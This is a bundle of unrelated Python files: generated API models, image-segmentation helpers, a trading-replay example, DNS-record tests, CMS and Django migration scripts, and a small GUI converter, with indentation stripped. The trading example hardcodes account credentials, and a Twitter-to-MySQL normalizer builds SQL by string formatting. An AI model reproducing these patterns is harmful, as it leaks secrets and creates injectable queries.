def time(self):
"""Gets the time of this MarginAccountBook. # noqa: E501
Balance changed timestamp # noqa: E501
:return: The time of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this MarginAccountBook.
Balance changed timestamp # noqa: E501
:param time: The time of this MarginAccountBook. # noqa: E501
:type: str
"""
self._time = time
@property
def time_ms(self):
"""Gets the time_ms of this MarginAccountBook. # noqa: E501
The timestamp of the change (in milliseconds) # noqa: E501
:return: The time_ms of this MarginAccountBook. # noqa: E501
:rtype: int
"""
return self._time_ms
@time_ms.setter
def time_ms(self, time_ms):
"""Sets the time_ms of this MarginAccountBook.
The timestamp of the change (in milliseconds) # noqa: E501
:param time_ms: The time_ms of this MarginAccountBook. # noqa: E501
:type: int
"""
self._time_ms = time_ms
@property
def currency(self):
"""Gets the currency of this MarginAccountBook. # noqa: E501
Currency changed # noqa: E501
:return: The currency of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this MarginAccountBook.
Currency changed # noqa: E501
:param currency: The currency of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency = currency
@property
def currency_pair(self):
"""Gets the currency_pair of this MarginAccountBook. # noqa: E501
Account currency pair # noqa: E501
:return: The currency_pair of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency_pair
@currency_pair.setter
def currency_pair(self, currency_pair):
"""Sets the currency_pair of this MarginAccountBook.
Account currency pair # noqa: E501
:param currency_pair: The currency_pair of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency_pair = currency_pair
@property
def change(self):
"""Gets the change of this MarginAccountBook. # noqa: E501
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:return: The change of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._change
@change.setter
def change(self, change):
"""Sets the change of this MarginAccountBook.
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:param change: The change of this MarginAccountBook. # noqa: E501
:type: str
"""
self._change = change
@property
def balance(self):
"""Gets the balance of this MarginAccountBook. # noqa: E501
Balance after change # noqa: E501
:return: The balance of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this MarginAccountBook.
Balance after change # noqa: E501
:param balance: The balance of this MarginAccountBook. # noqa: E501
:type: str
"""
self._balance = balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MarginAccountBook):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MarginAccountBook):
return True
return self.to_dict() != other.to_dict()
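# Usage sketch (illustrative values): the generated model accepts keyword
# arguments and can be serialized back to a plain dict
#   entry = MarginAccountBook(id="123", currency="BTC", change="-0.1", balance="4.5")
#   print(entry.to_dict())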
|
def spam():
pass # Unicode test: Ã after.
def eggs():
pass
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_identifier8
except ImportError:
btp_identifier8 = sys.modules["onshape_client.oas.models.btp_identifier8"]
try:
from onshape_client.oas.models import btp_module_id235
except ImportError:
btp_module_id235 = sys.modules["onshape_client.oas.models.btp_module_id235"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPTopLevelImport285AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"combined_namespace_path_and_version": (str,), # noqa: E501
"import_microversion": (str,), # noqa: E501
"module_id": (btp_module_id235.BTPModuleId235,), # noqa: E501
"namespace": ([btp_identifier8.BTPIdentifier8],), # noqa: E501
"namespace_string": (str,), # noqa: E501
"space_before_import": (btp_space10.BTPSpace10,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"combined_namespace_path_and_version": "combinedNamespacePathAndVersion", # noqa: E501
"import_microversion": "importMicroversion", # noqa: E501
"module_id": "moduleId", # noqa: E501
"namespace": "namespace", # noqa: E501
"namespace_string": "namespaceString", # noqa: E501
"space_before_import": "spaceBeforeImport", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_top_level_import285_all_of.BTPTopLevelImport285AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
combined_namespace_path_and_version (str): [optional] # noqa: E501
import_microversion (str): [optional] # noqa: E501
module_id (btp_module_id235.BTPModuleId235): [optional] # noqa: E501
namespace ([btp_identifier8.BTPIdentifier8]): [optional] # noqa: E501
namespace_string (str): [optional] # noqa: E501
space_before_import (btp_space10.BTPSpace10): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
import os
from PIL import Image
import numpy as np
def get_files(folder, name_filter=None, extension_filter=None):
"""Helper function that returns the list of files in a specified folder
with a specified extension.
Keyword arguments:
- folder (``string``): The path to a folder.
- name_filter (```string``, optional): The returned files must contain
this substring in their filename. Default: None; files are not filtered.
- extension_filter (``string``, optional): The desired file extension.
Default: None; files are not filtered
"""
if not os.path.isdir(folder):
raise RuntimeError("\"{0}\" is not a folder.".format(folder))
# Filename filter: if not specified don't filter (condition always true);
# otherwise, use a lambda expression to filter out files that do not
# contain "name_filter"
if name_filter is None:
# This looks hackish...there is probably a better way
name_cond = lambda filename: True
else:
name_cond = lambda filename: name_filter in filename
# Extension filter: if not specified don't filter (condition always true);
# otherwise, use a lambda expression to filter out files whose extension
# is not "extension_filter"
if extension_filter is None:
# This looks hackish...there is probably a better way
ext_cond = lambda filename: True
else:
ext_cond = lambda filename: filename.endswith(extension_filter)
filtered_files = []
# Explore the directory tree to get files that contain "name_filter" and
# with extension "extension_filter"
for path, _, files in os.walk(folder):
files.sort()
for file in files:
if name_cond(file) and ext_cond(file):
full_path = os.path.join(path, file)
filtered_files.append(full_path)
return filtered_files
def pil_loader(data_path, label_path):
"""Loads a sample and label image given their path as PIL images.
Keyword arguments:
- data_path (``string``): The filepath to the image.
- label_path (``string``): The filepath to the ground-truth image.
Returns the image and the label as PIL images.
"""
data = Image.open(data_path)
label = Image.open(label_path)
return data, label
def remap(image, old_values, new_values):
assert isinstance(image, Image.Image) or isinstance(
image, np.ndarray), "image must be of type PIL.Image or numpy.ndarray"
assert type(new_values) is tuple, "new_values must be of type tuple"
assert type(old_values) is tuple, "old_values must be of type tuple"
assert len(new_values) == len(
old_values), "new_values and old_values must have the same length"
# If image is a PIL.Image convert it to a numpy array
if isinstance(image, Image.Image):
image = np.array(image)
# Replace old values by the new ones
tmp = np.zeros_like(image)
for old, new in zip(old_values, new_values):
# Since tmp is already initialized as zeros we can skip new values
# equal to 0
if new != 0:
tmp[image == old] = new
return Image.fromarray(tmp)
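# Usage sketch (label_img and the value pairs are illustrative): map the ignore
# value 255 to 0 and relabel class 2 as class 1 in a single call
#   new_label = remap(label_img, old_values=(255, 2), new_values=(0, 1))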
def enet_weighing(dataloader, num_classes, c=1.02):
"""Computes class weights as described in the ENet paper:
w_class = 1 / (ln(c + p_class)),
where c is usually 1.02 and p_class is the propensity score of that
class:
propensity_score = freq_class / total_pixels.
References: https://arxiv.org/abs/1606.02147
Keyword arguments:
- dataloader (``data.Dataloader``): A data loader to iterate over the
dataset.
- num_classes (``int``): The number of classes.
    - c (``float``, optional): An additional hyper-parameter which restricts
the interval of values for the weights. Default: 1.02.
"""
class_count = 0
total = 0
for _, label in dataloader:
label = label.cpu().numpy()
# Flatten label
flat_label = label.flatten()
# Sum up the number of pixels of each class and the total pixel
# counts for each label
class_count += np.bincount(flat_label, minlength=num_classes)
total += flat_label.size
# Compute propensity score and then the weights for each class
propensity_score = class_count / total
class_weights = 1 / (np.log(c + propensity_score))
return class_weights
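# Worked example of the formula above (not from the original code): a class that
# covers 90% of all pixels gets w = 1 / ln(1.02 + 0.9) ~ 1.53, while a rare class
# at 1% gets w = 1 / ln(1.02 + 0.01) ~ 33.8, so rare classes are strongly upweighted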
def median_freq_balancing(dataloader, num_classes):
"""Computes class weights using median frequency balancing as described
in https://arxiv.org/abs/1411.4734:
w_class = median_freq / freq_class,
where freq_class is the number of pixels of a given class divided by
the total number of pixels in images where that class is present, and
median_freq is the median of freq_class.
Keyword arguments:
    - dataloader (``data.Dataloader``): A data loader to iterate over the
    dataset whose weights are going to be computed.
    - num_classes (``int``): The number of classes
"""
class_count = 0
total = 0
for _, label in dataloader:
label = label.cpu().numpy()
# Flatten label
flat_label = label.flatten()
# Sum up the class frequencies
bincount = np.bincount(flat_label, minlength=num_classes)
# Create of mask of classes that exist in the label
mask = bincount > 0
# Multiply the mask by the pixel count. The resulting array has
# one element for each class. The value is either 0 (if the class
# does not exist in the label) or equal to the pixel count (if
# the class exists in the label)
total += mask * flat_label.size
# Sum up the number of pixels found for each class
class_count += bincount
# Compute the frequency and its median
freq = class_count / total
med = np.median(freq)
return med / freq
|
# -*- coding: utf-8 -*-
__author__ = 'pengg'
from datetime import date
from tqsdk import TqApi, TqAuth, TqReplay
'''
Replay mode example: full replay of the market data of a specified date
Replay the 2020-10-15 market data
'''
# Passing TqReplay when creating the api instance enables replay mode
api = TqApi(backtest=TqReplay(date(2020, 10, 15)), auth=TqAuth("aimoons", "112411"))
quote = api.get_quote("SHFE.cu2101")
while True:
api.wait_update()
if api.is_changing(quote):
        print("Latest price", quote.datetime, quote.last_price)
|
#!/usr/bin/env python
import ast
import re
from setuptools import setup, find_packages
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('pipeline_live/_version.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
with open('README.md') as readme_file:
README = readme_file.read()
setup(
name='pipeline-live',
version=version,
description='Zipline Pipeline extension for live trade',
long_description=README,
long_description_content_type='text/markdown',
author='Alpaca',
author_email='oss@alpaca.markets',
url='https://github.com/alpacahq/pipeline_live',
keywords='financial,zipline,pipeline,stock,screening,api,trade',
packages=find_packages(),
install_requires=[
'alpaca-trade-api>=0.29',
'iexfinance>=0.4.1',
'zipline==1.3.0',
'numpy==1.16.1',
],
tests_require=[
'pytest',
'pytest-cov',
'flake8',
],
setup_requires=['pytest-runner', 'flake8'],
)
|
import pytest
from dolib.client import AsyncClient, Client
from dolib.models import Domain
@pytest.mark.vcr
@pytest.mark.block_network()
def test_crud_domains(client: Client) -> None:
domain = Domain(name="test.dolib.io")
# create domain
created_domain = client.domains.create(domain=domain)
assert created_domain.name == "test.dolib.io"
# read domain
read_domain = client.domains.get(name=domain.name)
assert read_domain.name == domain.name
assert read_domain.ttl > 0
assert len(read_domain.zone_file) > 0
# list domains
domains = client.domains.all()
assert len(domains) > 0
# create domain record
record = Domain.Record(type="A", name="@", data="8.8.8.8")
record = client.domains.create_record(name=domain.name, record=record)
assert record.id > 0
assert record.ttl == 1800
# update domain record
record.name = "test"
record.ttl = 60
record = client.domains.update_record(name=domain.name, record=record)
assert record.ttl == 60
assert record.name == "test"
# read domain records
records = client.domains.records(name=domain.name)
len_records = len(records)
assert len_records > 0
filtered_records = client.domains.records(
name=domain.name, record_name="test.test.dolib.io", record_type="A"
)
assert len(filtered_records) == 1
# delete domain record
client.domains.delete_record(name=domain.name, record=record)
# delete domain
client.domains.delete(domain=created_domain)
@pytest.mark.vcr
@pytest.mark.block_network()
@pytest.mark.asyncio
async def test_async_crud_domains(async_client: AsyncClient) -> None:
domain = Domain(name="test.dolib.io")
# create domain
created_domain = await async_client.domains.create(domain=domain)
assert created_domain.name == "test.dolib.io"
# read domain
read_domain = await async_client.domains.get(name=domain.name)
assert read_domain.name == domain.name
assert read_domain.ttl > 0
assert len(read_domain.zone_file) > 0
# list domains
domains = await async_client.domains.all()
assert len(domains) > 0
# create domain record
record = Domain.Record(type="A", name="@", data="8.8.8.8")
record = await async_client.domains.create_record(name=domain.name, record=record)
assert record.id > 0
assert record.ttl == 1800
# update domain record
record.name = "test"
record.ttl = 60
record = await async_client.domains.update_record(name=domain.name, record=record)
assert record.ttl == 60
assert record.name == "test"
# read domain records
records = await async_client.domains.records(name=domain.name)
len_records = len(records)
assert len_records > 0
filtered_records = await async_client.domains.records(
name=domain.name, record_name="test.test.dolib.io", record_type="A"
)
assert len(filtered_records) == 1
# delete domain record
await async_client.domains.delete_record(name=domain.name, record=record)
# delete domain
await async_client.domains.delete(domain=created_domain)
|
import logging
from django.db import transaction
from wagtail.wagtailcore.models import Page, Site
from v1.models import BrowsePage, LandingPage, SublandingPage
from v1.tests.wagtail_pages.helpers import save_new_page
logger = logging.getLogger(__name__)
@transaction.atomic
def run():
default_site = Site.objects.get(is_default_site=True)
root_page = default_site.root_page
try:
about_us = Page.objects.get(slug='about-us')
except Page.DoesNotExist:
logger.info('Creating page: About Us')
about_us = LandingPage(title='About Us', slug='about-us', live=False)
save_new_page(about_us, root=root_page)
try:
careers = Page.objects.get(slug='careers')
except Page.DoesNotExist:
logger.info('Creating page: Careers')
careers = SublandingPage(title='Careers', slug='careers', live=False)
save_new_page(careers, root=about_us)
child_pages = [
('Working at the CFPB', 'working-at-cfpb'),
('Job Application Process', 'application-process'),
('Students and Graduates', 'students-and-graduates'),
('Current Openings', 'current-openings'),
]
for title, slug in child_pages:
try:
child_page = Page.objects.get(slug=slug)
except Page.DoesNotExist:
logger.info('Creating page: {}'.format(title))
child_page = BrowsePage(title=title, slug=slug, live=False)
save_new_page(child_page, careers)
if '__main__' == __name__:
run()
|
"""Defines a Request Forward Message."""
# System imports
from enum import IntEnum
# Local source tree imports
from pyof.foundation.base import GenericMessage
from pyof.v0x05.common.header import Header,Type
# Enums
class RequestForwardReason(IntEnum):
"""
Request Forward Reason
"""
#: Forward Group Mod requests
OFPRFR_GROUP_MOD = 0
#: Forward meter mod requests
OFPRFR_METER_MOD = 1
# Classes
class RequestForwardHeader(GenericMessage):
"""Ofp Request Forward Header"""
#: Type OFPT_REQUESTFORWARD
header = Header(message_type=Type.OFPT_REQUESTFORWARD)
#: Request being forwarded
request = Header()
|
#!/usr/bin/python3
import json,datetime,time,argparse,logging,sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), "libs"))
from boto3.dynamodb.conditions import Attr
import general_storage,sqs,utils,query,general_storage_mysql
from progress.bar import Bar
from pprint import pprint
class Normalizer():
## Normalizer class hold data and configurations for normalizing source/target pairs
## source(input) of normalization
source={}
## target(output) of normalization
target={}
## mapping from target key to source key or lambda function
target_source_rule={}
def set_source(self,source):
self.source=source
def set_target(self,target):
self.target=target
def get_source_value(self,s):
## get value from source with key s or lambda function s
mapping=self.target_source_rule[s]
if isinstance(mapping,str):
## if mapping is a string key
return self.source.get(mapping)
else:
## if mapping is lambda function
return mapping(self)
def get_info(self,item):
## get info field
author = self.get_author(item)
return utils.fix_data_to_string({
"created_time" : item["created_time"],
"message":item['message'],
"from" : author
})
def get_author(self,item):
## get author field
return utils.fix_data_to_string({"id":item["user_id"],
"name":item.get("user_name","unknown"),
"profile_picture_url":item['original_data'].get("user",{}).get("profile_image_url_https","")})
def normalize_source_to_target(self,cf,source):
        ## Normalizing from source object to target object
self.set_source(source)
if self.source:
for s in self.target_source_rule:
self.target[s] = self.get_source_value(s)
else:
print("No source specified")
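## How the mapping resolves (descriptive sketch, not original code): for each key in
## target_source_rule, a string value is looked up in the source dict
## (e.g. target['page_id'] = source.get('asset_id') in the subclasses below), while a
## lambda value is called with the normalizer itself (e.g. 'info' builds a string via get_info)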
class Normalizer_post_dynomodb_mysql(Normalizer):
## Normalizer class for post from dynamodb to mysql
name="posts"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'post_id':'object_id',
'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
class Normalizer_comment_dynomodb_mysql(Normalizer):
## Normalizer class for comment from dynamodb to mysql
name="comments"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'message':'message',
'post_id':'post_id',
'comment_id':'object_id',
#'parent_id':'post_id',
#'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
def insert_dynamodb_item_into_mysql(cf,i):
## Main function to call normalizer to normalize object from dynamodb object to mysql object, and then insert normalized item to mysql database
if i['object_type']=='post':
nl = Normalizer_post_dynomodb_mysql()
else:
nl = Normalizer_comment_dynomodb_mysql()
nl.normalize_source_to_target(cf,i)
connection = general_storage_mysql.create_connection(cf)
attributes,values = general_storage_mysql.simple_json_to_mysql_query(nl.target)
query="insert into twit_%s_%s(%s) values(%s)" %(nl.name,cf.client_short_name,attributes,values)
print(query)
general_storage_mysql.execute_query(connection,query)
def delete_mysql_item(cf,i):
## Main function to call deleteitem to mysql database
if i['object_type']=='post':
        query="delete from twit_posts_%s where post_id=%s" %(cf.client_short_name,i['object_id'])
else:
        query="delete from twit_comments_%s where comment_id=%s" %(cf.client_short_name,i['object_id'])
connection = general_storage_mysql.create_connection(cf)
general_storage_mysql.execute_query(connection,query)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Normalizer for twitter between DynamoDB and mysql')
parser.add_argument('config', type=str, help='an config file for normalizer')
parser.add_argument('--query', type=str, default=None, help='query to get data for normalizer')
parser.add_argument('--type', type=str, default="own", help='general or own. general:get everything using query; own:get own post and all replies')
args = parser.parse_args()
config = __import__(args.config)
cf =config.Config()
if args.type=="own":
query_str = args.query
if query_str:
query_str = query_str + " AND user_id:%s AND object_type:post" %(cf.twitter_user_id)
else:
query_str="user_id:%s AND object_type:post" %(cf.twitter_user_id)
total,posts = query.query_items(cf,query_str)
if total>0:
for post_id in [x["id"] for x in posts]:
post_with_comments=general_storage.get_item_and_comments(cf,post_id)
#print("%s comments" %(len(post_with_comments["comments"])))
insert_dynamodb_item_into_mysql(cf,post_with_comments["item"])
for comment in post_with_comments["comments"]:
insert_dynamodb_item_into_mysql(cf,comment)
elif args.type=="general":
#utils.run_until_finish(lambda: utils.process_sqs_rerun(cf,queue_name,process_clara,cf.clara_batch_size))
db_items=general_storage.get_items_by_ids(cf,query.es_outputs_to_ids(items))
for i in db_items:
insert_dynamodb_item_into_mysql(cf,i)
|
"""
Png to Ico
"""
import toga
from toga.style import Pack
from toga.style.pack import COLUMN, ROW
from PIL import Image
import random
import os
class Png2Ico(toga.App):
def startup(self):
        self.msg = 'Please begin the operation'
main_box = toga.Box(style=Pack(direction=COLUMN))
img_path_box = toga.Box(style=Pack(direction=ROW))
labelPath = toga.Label(
            'Please select a file',
style=Pack(padding=(5, 5))
)
self.labelMsg = toga.Label(
self.msg,
style=Pack(padding=(5, 5))
)
buttonDir = toga.Button(
            'Select image',
on_press=self.select_png,
style=Pack(padding=5)
)
buttonExec = toga.Button(
            'Convert',
on_press=self.png_to_ico,
style=Pack(padding=5)
)
self.dirInput = toga.TextInput(style=Pack(flex=1), readonly=True)
img_path_box.add(labelPath)
img_path_box.add(buttonDir)
img_path_box.add(self.dirInput)
main_box.add(img_path_box)
main_box.add(self.labelMsg)
main_box.add(buttonExec)
self.main_window = toga.MainWindow(title=self.formal_name)
self.main_window.content = main_box
self.main_window.show()
def select_png(self, widget):
try:
pngPath_ = self.main_window.open_file_dialog(
                'Please select a png image', file_types="(*.png)|*.png")
if pngPath_:
if pngPath_.split('.').pop() == 'png':
self.pngPath = pngPath_
                    self.msg = 'Image selected. The converted file will be saved to the same directory.'
else:
                    self.msg = 'Please select a png-format image.'
self.pngPath = ''
except Exception as e:
self.pngPath = ''
self.labelMsg.text = self.msg
self.dirInput.value = self.pngPath
def png_to_ico(self, widget):
try:
self.pngPath
goOn = 1
if self.dirInput.value == self.pngPath:
goOn = 1
else:
goOn = 0
except Exception:
goOn = 0
if goOn and os.path.exists(self.pngPath):
if self.pngPath:
preList_ = self.pngPath.split('\\')
preList_.pop()
self.saveDir = '\\'.join(preList_)+'\\'
                self.msg = 'Save path selected, converting...'
goOn = 1
else:
                self.msg = 'Save path does not exist'
goOn = 0
self.labelMsg.text = self.msg
if goOn == 1:
toIco = Image.open(self.pngPath)
                toIco.save(self.saveDir + 'transformed' +
                           str(random.randint(10000, 99999)) + '.ico')
                self.msg = 'Conversion succeeded!'
else:
pass
else:
            self.msg = 'The selected path does not exist, please choose again.'
self.labelMsg.text = self.msg
def main():
    # The formal name and app id below are placeholders; adjust them to your packaging metadata.
    return Png2Ico('Png to Ico', 'org.example.png2ico')
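# Hedged launch sketch: a toga app is typically started by running its event loop.
if __name__ == '__main__':
    main().main_loop()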
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.DYU/Sun-ExtA_16/udhr_Latn.DYU_Sun-ExtA_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('choice', models.CharField(max_length=256, verbose_name='valg')),
],
options={
'permissions': (('view_choice', 'View Choice'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Feedback',
fields=[
('feedback_id', models.AutoField(serialize=False, primary_key=True)),
('description', models.CharField(max_length=100, verbose_name='beskrivelse')),
('display_field_of_study', models.BooleanField(default=True, help_text='Grafen over studiefelt vil bli vist til bedriften', verbose_name='Vis studie oversikt')),
('display_info', models.BooleanField(default=True, help_text='En boks med ekstra informasjon vil bli vist til bedriften', verbose_name='Vis extra informasjon')),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'tilbakemeldingsskjema',
'verbose_name_plural': 'tilbakemeldingsskjemaer',
'permissions': (('view_feedback', 'View Feedback'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FeedbackRelation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('deadline', models.DateField(verbose_name='Tidsfrist')),
('gives_mark', models.BooleanField(default=True, help_text='Gir automatisk prikk til brukere som ikke har svart innen fristen', verbose_name='Gir Prikk')),
('active', models.BooleanField(default=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
('first_mail_sent', models.BooleanField(default=False)),
('answered', models.ManyToManyField(related_name='feedbacks', null=True, to=settings.AUTH_USER_MODEL, blank=True)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('feedback', models.ForeignKey(verbose_name='Tilbakemeldingskjema', to='feedback.Feedback')),
],
options={
'verbose_name': 'tilbakemelding',
'verbose_name_plural': 'tilbakemeldinger',
'permissions': (('view_feedbackrelation', 'View FeedbackRelation'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FieldOfStudyAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.SmallIntegerField(verbose_name='Studieretning', choices=[(0, 'Gjest'), (1, 'Bachelor i Informatikk (BIT)'), (10, 'Software (SW)'), (11, 'Informasjonsforvaltning (DIF)'), (12, 'Komplekse Datasystemer (KDS)'), (13, 'Spillteknologi (SPT)'), (14, 'Intelligente Systemer (IRS)'), (15, 'Helseinformatikk (MSMEDTEK)'), (30, 'Annen mastergrad'), (80, 'PhD'), (90, 'International'), (100, 'Annet Onlinemedlem')])),
('feedback_relation', models.ForeignKey(related_name='field_of_study_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_fieldofstudyanswer', 'View FieldOfStudyAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.CharField(max_length=256, verbose_name='svar')),
('feedback_relation', models.ForeignKey(related_name='multiple_choice_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_multiplechoiceanswer', 'View MultipleChoiceAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
],
options={
'permissions': (('view_multiplechoicequestion', 'View MultipleChoiceQuestion'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceRelation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=30, verbose_name='Rekkef\xf8lge')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='multiple_choice_questions', to='feedback.Feedback')),
('multiple_choice_relation', models.ForeignKey(to='feedback.MultipleChoiceQuestion')),
],
options={
'permissions': (('view_multiplechoicerelation', 'View MultipleChoiceRelation'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RatingAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.SmallIntegerField(default=0, verbose_name='karakter', choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6')])),
('feedback_relation', models.ForeignKey(related_name='rating_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_ratinganswer', 'View RatingAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RatingQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=20, verbose_name='Rekkef\xf8lge')),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='rating_questions', to='feedback.Feedback')),
],
options={
'permissions': (('view_ratingquestion', 'View RatingQuestion'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RegisterToken',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('token', models.CharField(max_length=32, verbose_name='token')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='opprettet dato')),
('fbr', models.ForeignKey(related_name='Feedback_relation', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_feedbackregistertoken', 'View FeedbackRegisterToken'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.TextField(verbose_name='svar')),
('feedback_relation', models.ForeignKey(related_name='text_answers', to='feedback.FeedbackRelation')),
],
options={
